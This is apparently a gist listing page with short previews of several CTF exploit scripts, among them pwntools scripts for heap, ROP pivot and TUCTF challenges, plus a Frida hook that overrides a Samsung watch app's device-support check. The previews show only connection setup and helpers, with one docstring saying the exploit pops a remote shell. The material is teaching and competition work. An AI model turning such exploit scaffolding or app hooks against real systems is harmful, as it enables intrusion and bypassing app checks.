This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
def create(size, content=None): | |
s.send("1\n") | |
s.recvuntil("Choose the size of prison heap") | |
s.send("{}\n".format(size)) | |
s.recvuntil("Enter the name of the person who is going to enter the prison") | |
#sleep(0.5) | |
s.send("{}\n".format(content)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import threading | |
from pwn import * | |
from socket import * | |
import struct | |
from telnetlib import Telnet | |
class ChatClient: | |
def __init__(self, server): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
IP = 'localhost' | |
PORT = 54321 | |
s = None | |
def send_msg(msg, size): | |
s = remote(IP, PORT) | |
COOKIE = "Eko2019\x00" | |
s.send(COOKIE + pack(size, 64, 'little', True)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# coding=utf-8 | |
# Writeup: https://elladodelnovato.blogspot.com/2018/10/ctf-nn8ed-navaja-negra-pokedex.html | |
from pwn import * | |
env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc-2.27.so")} | |
s = process("./pokedex_nn2k18", env=env) | |
#s = remote('challenges.ka0labs.org', 1341) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
''' | |
TUCTF 2017 - https://tuctf.asciioverflow.com/ | |
temple (500 points) - PWN | |
-------------------------------------------------------- | |
(Small)Explanation at the end of the file. | |
-------------------------------------------------------- | |
''' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
''' | |
Solution for ROP Emporium pivot's challenge (https://ropemporium.com/challenge/pivot.html) | |
It pops a remote shell. | |
Run the binary with: nc -lvc ./pivot -p 4444 | |
Then, run this exploit :) | |
''' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket | |
from struct import pack | |
def p(x): | |
return pack('<L', x) | |
s = socket.socket( | |
socket.AF_INET, socket.SOCK_STREAM) | |
s.connect(("165.227.98.55", 3333)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Java.perform(function () { | |
// Function to hook is defined here | |
var HostManagerUtils = Java.use('com.samsung.android.app.twatchmanager.util.HostManagerUtils'); | |
HostManagerUtils.isSupportedInHostDevice.implementation = function (p1) { | |
var result = this.isSupportedInHostDevice(p1); | |
console.log("isSupportedInHostDevice return: " + result); |